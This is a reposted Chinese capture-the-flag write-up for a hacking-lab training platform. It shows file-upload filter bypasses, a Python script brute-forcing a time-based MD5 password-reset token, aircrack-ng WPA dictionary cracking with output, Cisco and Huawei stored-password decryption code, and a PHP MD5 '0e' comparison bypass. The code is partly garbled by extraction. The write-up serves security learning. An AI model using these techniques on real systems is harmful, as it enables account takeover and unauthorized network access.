## 网络信息安全攻防学习平台 上传,解密通关writeup

```
于 2017-03-09 12:32:00 发布 💿 385 🛠 收藏
anxinzhuan3701
文章标签: php
原文链接: http://www.cnblogs.com/Elope/p/6525075.html
版权
上传关
[1]
查看源代码,发现JS代码。提交时onclick进行过验证。
ctrl+shift+i 打开开发者工具,将conclick修改为 return True,即可以上传
上传php文件,拿到KEY
key is IKHJL9786#$%^&
[2]
查看源代码,发现JS文件。发现是经过服务器端验证。
伪造一张jpg图片进行上传,利用burp截断,将文件名改为PHP就拿到key
key is 76tyuhjsdvytig#$%^&
[3]
查看源代码,发现JS代码。
var filename=document.getElementByld("file");
var str=filename.value.split(".");
var ext=str[1];
发现只是验证了文件名后第一个后缀,进行 file.jpg.php进行绕过
得到key key is 76tyuh12OKKytig#$%^&
解密关
[1] 以管理员身份登录系统
直接点重置密码,发现返回空白的页面。查看源代码,发现tip1,验证自己思路没错。
在url中发现参数sukey,长度为32位,对其进行MD5解密。发觉以下规律
payload:
import requests
import hashlib
import time
se = requests.session()
headers = {'Cookie': 'PHPSESSID=25443616fac3435849c2f3e77b54a4ca'}
while 1:
sukey = hashlib.new('md5', str(int(time.time()))).hexdigest()
url = 'http://lab1.xseclab.com/password1 dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=' + sukey +
'&username=admin'
r = se.get(url, headers=headers)
if r.content:
print r.content
break
else:
print 'Cracking: ' + sukey
拿到key
```

## [2] 邂逅对门的妹纸

一个包,打开后发现是经过加密的。需要解密。 根据提示做一个字典 with open("password.txt","w") as f: for year in range(1980,2015): for month in range(1,13): for day in range(1,32): f.write("%d%02d%02d\n" % (year,month,day))

开始暴力破解。 root@kali:~/Desktop# aircrack-ng wifi-crack.cap Opening wifi-crack.cap Read 17812 packets.

**# BSSID ESSID Encryption** 

1 54:E6:FC:53:E6:D0 hackinglab WPA (1 handshake)

Choosing first network as target.

Opening wifi-crack.cap Please specify a dictionary (option -w).

Quitting aircrack-ng...

发现BSSID,ESSID

root@kali:~/Desktop# aircrack-ng -e hackinglab -b 54:E6:FC:53:E6:D0 -w password.txt wifi-crack.cap Opening wifi-crack.cap Reading packets, please wait...

Aircrack-ng 1.2 beta3

[00:00:05] 5436 keys tested (954.82 k/s)

KEY FOUND! [ 19940808 ]

Master Key : 92 D0 BF EB 09 69 E7 29 78 85 B4 48 64 20 D9 E9 17 B2 70 20 1B E7 A9 B9 06 27 C6 65 B0 5B 92 FA

Transient Key : 58 1D E4 36 66 67 BA 5A 76 17 A7 75 34 27 C4 3F BA D0 1A 5C 43 6E C1 87 FA A6 07 84 17 AA 1B A8 8F 24 B4 6D 54 39 CD 0B BA BA 95 63 43 A7 6C E1 4D 1A C1 17 23 47 F1 3D 9A 8C 42 24 5D 8E 24 69

EAPOL HMAC: 02 C8 6C C3 C6 51 2D DC CA 68 ED 8A 5C 9D CE A6 得到密码, MD5加密提交

[3]万恶的Cisco 直接安装 cisco crack进行破解 a = "02070D48030F1C294940041801181C0C140D0A0A20253A3B" crack=cisco decrypt.CiscoPassword() crack.decrypt(a) S = 2 S = 3 S = 4 S = 5 S = 6 S = 7 S = 8 S = 9 S = 10 S = 11 S = 12 S = 13 S = 14 S = 15 S = 16 S = 17 S = 18 S = 19 S = 20 S = 21 S = 22 S = 23 S = 24 'aishishenmadongxi@Admin' [4]万恶的加密 提示华为的交换机,谷歌搜一下,看到一篇文章,可惜 Windows 下跑不了这个脚本,放到 Kali 下,成功拿到 key. # coding=utf-8 from Crypto.Cipher import DES def decode\_char(c): if c == 'a': r = '?' else: r = c return ord(r) - ord('!') def ascii\_to\_binary(s): assert len(s) == 24 out = [0]\*18 i = 0 i = 0

```
for i in range(0, len(s), 4):
y = decode char(s[i + 0])
y = (y << 6) & 0xfffff
k = decode char(s[i + 1])
y = (y | k) \& 0xffffff
y = (y << 6) \& 0xffffff
k = decode char(s[i + 2])
y = (y | k) \& 0xffffff
y = (y << 6) \& 0xffffff
k = decode_char(s[i + 3])
y = (y | k) \& 0xffffff
out[j+2] = chr(y \& 0xff)
out[j+1] = chr((y >> 8) \& 0xff)
out[j+0] = chr((y>>16) \& 0xff)
i += 3
return "".join(out)
def decrypt_password(p):
r = ascii to binary(p)
r = r[:16]
d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE ECB)
r = d.decrypt(r)
return r.rstrip("\x00")
if __name__ == '__main__':
miwen = "aK9Q4I)J'#[Q=^Q`MAF4<1!!"
print u'明文' + decrypt_password(miwen)
[5] 喜欢泡网吧的小明
不会
[6]异常数据
发现加密数据后面有个=,明显的base64加密。但是都是大写,很有可能全部转为大写
payload
from base64 import *
import re
def dfs(res, arr, pos):
res.append(".join(arr))
i = pos
for i in range(i, len(arr)):
if arr[i] \le Z' and arr[i] \ge A':
arr[i] = arr[i].lower()
dfs(res, arr, i + 1)
arr[i] = arr[i].upper()
arr = list('AGV5IULSB3ZLVSE=')
res = []
```

dfs(res, arr, 0) res decode = map(b64decode, res) for i in res decode: if re.findall(r'\\x', repr(i)): continue else: print i hey!IRovKU! hey!IRoveU! [7]md5真的能碰撞嘛? <?php \$flag=FLAG; if(isset(\$\_POST["password"])){ \$password=\$ POST['password']; \$rootadmin="!1793422703!"; if(\$password==\$rootadmin){die("Please do not attack admin account!");} if(md5(\$password)==md5(\$rootadmin)){ echo \$flag; }else{ die("Password Error!"); } } ?> >>> hashlib.md5("!1793422703!").hexdigest() '0e332932043729729062996282883873' 开头为0e最后值显示为0. 直接百度"MD5,0e" post提交 password=s214587387a拿到flag [8]小明爱上了一个搞硬件的小姑凉 改为txt文件。发现 serialization::archive 10 25 SaleaeAsyncSerialAnalyzer 0 20 13973230967232177885 1 1 9600 8 1 0 1 0 0 Async Serial Analyzer 百度搜索为一文件名。 查看其它writeup,为下载该软件,打开就可以拿到flag [9] 没思路,以后补充

转载于:https://www.cnblogs.com/Elope/p/6525075.html